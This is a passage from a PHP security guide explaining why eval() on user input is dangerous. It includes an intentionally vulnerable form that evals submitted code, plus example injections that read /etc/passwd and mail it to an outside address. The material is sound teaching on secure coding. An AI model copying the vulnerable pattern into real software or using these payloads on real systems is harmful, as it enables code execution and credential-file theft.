<html>
  <head>
    <title>Here are the keys...</title>
  </head>
  <body>
    <?php if ($code) {
      echo "Executing code...";

      eval(stripslashes($code));           // BAD!
    } ?>

  <form>
      <input type="text" name="code" />
      <input type="submit" name="Execute Code" />
  </form>
  </body>
</html>

This page takes some arbitrary PHP code from a form and runs it as part of the script. The running code has access to all of the global variables for the script and runs with the same privileges as the script running the code. It's not hard to see why this is a problem—type this into the form:

include('/etc/passwd');

Unfortunately, there's no easy way to ensure that a script like this can ever be secure.

disable_functions = system

This doesn't make eval( ) any safer, though, as there's no way to prevent important variables from being changed or built-in constructs such as echo( ) from being called.

In the case of include, require, include_once, and require_once, your best bet is to turn off remote file access using allow_url_fopen.

The main message of this section is that any use of eval( ) and the /e option with preg_replace( ) is suspect, especially if you allow users to put bits into the code. Consider the following:

eval("2 + $user_input");

It seems pretty innocuous. However, suppose the user enters the following value:

2; mail("l33t@somewhere.com", "Some passwords", `/bin/cat /etc/passwd`);

In this case, both the command you expected and one you'd rather wasn't will be executed. The only viable solution is to never give user-supplied data to eval( ).

12.5. Concealing PHP Libraries		12.7. Shell Commands